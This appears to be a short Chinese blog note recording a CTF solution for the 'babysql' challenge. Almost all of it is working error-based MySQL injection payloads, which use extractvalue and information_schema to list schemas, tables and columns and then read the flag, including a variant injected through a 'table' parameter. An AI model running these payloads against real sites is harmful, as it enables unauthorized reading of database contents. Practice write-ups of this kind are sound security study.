1. 库名

?id=1 and extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))#

安恒杯-babysql

 

2. 表名

?id=1 and extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))#

安恒杯-babysql

 

3. 猜列名的时候出了问题

?id=1 and extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))#

安恒杯-babysql

 

测试table字段可以注入(参考http://www.bubuko.com/infodetail-2392442.html的wp)

1. 库名

?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))%23`&id=1

安恒杯-babysql

 

2. 表名

?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))%23`&id=1 

安恒杯-babysql

 

3. 列名

?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))%23`&id=1

安恒杯-babysql

 

4. 内容

?table=flag`%23` where 0=extractvalue(1,(select flag_you_will_never_know from error_flag))%23`&id=1

安恒杯-babysql

 

 

记录一下,方便之后查看

 

本文固定链接:http://www.cnblogs.com/hell0w/p/8120585.html

相关文章:

  • 2022-01-21
  • 2021-08-01
  • 2022-01-09
  • 2022-12-23
  • 2022-12-23
  • 2021-05-04
  • 2021-11-20
  • 2021-10-22
猜你喜欢
  • 2022-03-01
  • 2021-06-03
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-01-13
  • 2021-04-04
相关资源
相似解决方案